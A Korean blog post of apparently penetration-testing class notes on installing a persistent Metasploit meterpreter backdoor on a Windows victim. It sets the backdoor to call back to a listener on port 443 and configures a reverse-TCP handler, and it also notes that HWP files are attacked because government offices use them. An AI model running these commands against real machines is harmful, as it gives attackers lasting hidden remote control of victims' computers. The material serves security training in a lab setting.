File format attak
- SWF
- HWP
- AVI
요즘은 거의 HWP 를 주로 공격하는데, 그 이유는 관공서에서는 무조건 HWP 를 사용하기 때문이다.
자동백도어 설치
meterpreter> run persistence -h
-X : 시작시 자동실행
-i : 응답시간
-p : 포트번호
-r : 응답 받을 아이피. (백트랙의 아이피)
-L : 설치할 경로
meterpreter> run persistence -X -L c:\\ -i 10 -p 443 -r 192.168.7.131
--> 시스템 시작시 자동 실행, 포트 443, 192.168.7.131로 접속, 응답 시간 10초, c:\\에 설치.
그리고 백트랙에서는 핸들러를 열어야 한다.
msf> use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.7.131
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit
그리고 희생자를 재부팅하면,
결과값
스스로 쉡이 온 것을 볼 수 있다.
'외부 교육 정리 > 서울여대 정보보호 영재교육원' 카테고리의 다른 글
| 메타스플로잇 익스플로잇 추가 방법(raon00) (0) | 2015.01.16 |
|---|---|
| [모의해킹] 리눅스 웹서버 취약점 탐색 - nikto (0) | 2015.01.16 |
| [모의해킹] 타겟PC 에 Backdoor 설치 (0) | 2015.01.15 |
| 모의해킹 - Heap Overflow 를 이용한 Exploit (0) | 2015.01.15 |
| 메타스플로잇- API를 이용하기 (0) | 2015.01.15 |